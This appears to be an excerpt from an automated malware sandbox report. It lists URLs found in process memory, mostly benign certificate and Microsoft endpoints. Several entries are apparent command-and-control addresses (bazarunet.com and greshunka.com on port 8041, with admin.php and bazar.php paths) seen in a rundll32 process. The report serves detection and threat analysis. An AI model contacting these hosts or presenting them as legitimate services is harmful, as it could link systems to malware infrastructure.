Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 00000008.00000000.2452717662.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.i.lencr.org/0
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r10.o.lencr.org0#
Source: explorer.exe, 00000008.00000000.2452162910.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000002.3344619758.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.2451505146.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://t2.symcb.com0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://tl.symcd.com0&
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526696898.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2727327156.000001FF4CA51000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3333625550.000001FF4CF10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2927135917.000001FF4CA50000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2477041735.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536162683.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2536131672.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2444803935.000001FF4CA4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000008.00000000.2456761349.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000008.00000000.2449894954.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094523211.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000000.2452717662.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000000.2449894954.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3335475832.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000002.3333615520.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2448316593.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com/
Source: rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/
Source: rundll32.exe, 00000006.00000003.3012131667.000001FF4CA78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/$E
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/&
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/U
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php.
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php3#
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036648885.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.php9#
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.phpF
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/admin.phpO#
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/azar.php
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php8
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpi
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpll
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.phpll.mui
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2171396063.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/bazar.php~
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/f
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/in.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.phpf
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/net.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bazarunet.com:8041/zar.php
Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com/
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com/g;
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/I
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.php-7
Source: rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpGN
Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpUN
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpi
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpl.mui
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpp
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.php3?8
Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpAm=
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpGN
Source: rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpq#(
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/net.com:8041/Pw
